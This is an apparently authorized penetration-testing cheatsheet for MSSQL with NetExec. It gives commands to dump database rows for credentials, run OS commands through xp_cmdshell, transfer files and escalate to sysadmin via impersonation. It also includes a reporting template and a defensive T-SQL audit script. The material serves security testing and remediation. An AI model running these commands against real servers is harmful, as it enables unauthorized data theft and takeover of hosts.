## 🛡️ Methodology Checklist

- Confirm the service is up with any known-valid login
- Pick the right auth mode: AD (`-d [DOMAIN]`), local Windows (`-d .`), or SQL-native (`--local-auth`)
- List databases → enumerate tables → dump interesting rows (`-q`)
- Check for DBA/sysadmin (`Pwn3d!`)
- If `Pwn3d!`: OS command exec (`-x`) and file transfer (`--put-file`/`--get-file`)
- If not sysadmin: enumerate/abuse privesc with `-M mssql_priv`
- Roll back any privilege change after testing
## 🎯 Operational Context

Use when: TCP/1433 is open or you have MSSQL credentials. MSSQL is high-value: application databases hide credentials, flags, and business data, and a DBA/sysadmin login often yields OS command execution via `xp_cmdshell`.

Think Dumber First: `nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d [DOMAIN]` → if it prints `(Pwn3d!)`, the login is sysadmin-class; pivot hard (commands, files, privesc). If not, you can still read data with `-q`.

Skip when: No 1433 and no MSSQL creds; this is protocol-specific.
## ⚡ Tactical Cheatsheet

| Command | Tactical Outcome |
|---|---|
| `nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d [DOMAIN]` | Auth with an AD account |
| `nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d .` | Auth with a local Windows account |
| `nxc mssql [TARGET_IP] -u [USER] -p [PASS] --local-auth` | Auth with a SQL-native login |
| `nxc mssql … -q "SELECT name FROM master.dbo.sysdatabases"` | List all databases |
| `nxc mssql … -q "SELECT TABLE_SCHEMA, TABLE_NAME FROM [DB].INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'"` | List tables in a database |
| `nxc mssql … -q "SELECT * FROM [DB].[SCHEMA].[TABLE]"` | Dump a table |
| `nxc mssql … -x "whoami"` | Execute an OS command (DBA/sysadmin) |
| `nxc mssql … --put-file [LOCAL] [REMOTE]` | Upload a file |
| `nxc mssql … --get-file [REMOTE] [LOCAL]` | Download a file |
| `nxc mssql … -M mssql_priv` | Enumerate MSSQL privesc paths |
| `nxc mssql … -M mssql_priv -o ACTION=privesc` | Escalate to sysadmin |
| `nxc mssql … -M mssql_priv -o ACTION=rollback` | Revert a privesc grant |
## 🔬 Deep Dive & Workflow

### 1. Pick the right auth mode

This is the #1 cause of “valid creds” failing against MSSQL:

- `-d [DOMAIN]` → AD account (e.g. `[DOMAIN]\[USER]`)
- `-d .` → local Windows account (non-DC hosts)
- `--local-auth` → SQL-native login (created inside SQL Server, e.g. `sa`)

```bash
# Readiness / DBA check (in labs, MSSQL may need 2–3 min after target boot)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' -d [DOMAIN]
```

Look for a successful auth and whether `(Pwn3d!)` appears (= sysadmin-class).

### 2. Enumerate and loot data with -q

`-q` runs a SQL query; `-x` runs a Windows command.

```bash
# List databases
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -q "SELECT name FROM master.dbo.sysdatabases"

# List tables in a database
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] \
  -q "SELECT TABLE_SCHEMA, TABLE_NAME FROM [DB].INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'"

# Dump rows from an interesting table (creds, flags, tokens)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -q "SELECT * FROM [DB].[dbo].[TABLE]"
```

If a column shows as `b'...'` (bytes-style rendering), cast it:

```bash
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] \
  -q "SELECT CONVERT(VARCHAR(MAX), [COLUMN]) FROM [DB].[dbo].[TABLE]"
```

### 3. Command execution + file transfer (DBA/sysadmin)

```bash
# OS command via MSSQL (note: this is the SQL service context, NOT automatically host admin)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -x "whoami"

# Upload / download
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] --put-file [LOCAL_FILE] [REMOTE_PATH]
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] --get-file [REMOTE_PATH] [LOCAL_FILE]
```

### 4. Privilege escalation with mssql_priv

```bash
# See the module's actions (enum_priv default, privesc, rollback)
nxc mssql -M mssql_priv --options

# Enumerate paths: EXECUTE AS LOGIN, db_owner → sysadmin, impersonation
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -M mssql_priv

# Escalate to sysadmin
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -M mssql_priv -o ACTION=privesc

# Validate, then roll back when done (cleaner for the report)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -x "whoami"
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -M mssql_priv -o ACTION=rollback
```

## 🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Valid creds rejected | Wrong auth mode | Try `-d [DOMAIN]` (AD), `-d .` (local Windows), or `--local-auth` (SQL login) |
| Auth fails right after target boot | MSSQL not finished starting | Wait 2–3 min, retry with a known-valid login first |
| `--local-auth` “doesn’t work” | Misread as Windows-local | `--local-auth` = SQL-native login, not a Windows SAM account |
| Password with special chars fails | Shell parsing | Always single-quote the password: `-p '[PASS]'` |
| Column shows `b'...'` | Bytes-style tool rendering | `CONVERT(VARCHAR(MAX), [COLUMN])` |
| Command exec works but no host admin | SQL service context | Exec via MSSQL ≠ local admin on Windows; treat as a service-account foothold |
| `mssql_priv` inconsistent | Tested many users at once | Test one user at a time |
## 📝 Reporting Trigger

Finding Title: MSSQL Exposure Enables Data Disclosure and Privilege Escalation

Impact: A reachable MSSQL instance with weak or reused credentials allowed enumeration and disclosure of application database contents (credentials, business data), and, where the login held DBA/sysadmin rights, OS command execution and escalation to sysadmin via impersonation paths.

Root Cause: Over-privileged SQL logins, reused service-account passwords, and `xp_cmdshell`/impersonation left enabled. MSSQL reachable from non-trusted segments.

Recommendation: Enforce least privilege on SQL logins; remove unnecessary sysadmin/impersonation grants; disable `xp_cmdshell`; rotate and uniquify service-account passwords; restrict 1433 to required hosts.
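As an added example (not from the page, and not NetExec's own code), a T-SQL audit a DBA can run to verify the recommendation above: it surfaces the same conditions `mssql_priv` enumerates (sysadmin membership, server-level `IMPERSONATE` grants, `db_owner` membership, and the TRUSTWORTHY-database condition behind the `db_owner` → sysadmin path) plus the `xp_cmdshell` state. It assumes it is run as a sysadmin so every catalog view is readable; `sp_MSforeachdb` is an undocumented but long-present Microsoft stored procedure.

```sql
-- Added audit script (not from the page or NetExec); assumes a sysadmin session.
-- Each result set lists something that should be empty or explicitly justified.

-- 1. Is xp_cmdshell enabled?  value_in_use = 1 means yes.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Who holds sysadmin?  S = SQL login, U = Windows login, G = Windows group.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND sp.type IN ('S', 'U', 'G');

-- 3. Server-level IMPERSONATE grants (EXECUTE AS LOGIN paths).
--    A grant whose target is sysadmin is a direct escalation path.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');            -- GRANT or GRANT WITH GRANT OPTION

-- 4. TRUSTWORTHY databases owned by a sysadmin: db_owner there can reach
--    sysadmin. msdb is TRUSTWORTHY by design, so it is excluded.
SELECT d.name AS database_name,
       SUSER_SNAME(d.owner_sid) AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb';

-- 5. db_owner members in every database (cross-check against result set 4).
EXEC sp_MSforeachdb N'USE [?];
SELECT DB_NAME() AS database_name, m.name AS db_owner_member, m.type_desc
FROM sys.database_role_members AS rm
JOIN sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = ''db_owner'';';
```

Run it before and after remediation; a clean re-run (empty sets 3 and 4, and only expected rows in 2 and 5) is the evidence to attach to the finding.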
## 🔗 Related Nodes

- MSSQL_Port_1433 – MSSQL enumeration fundamentals
- Attacking_SQL_Databases – broader SQL attack techniques
- NetExec_PostExploitation – secret dumping and post-ex with nxc
- NetExec_Database_Modules – the nxc module system and database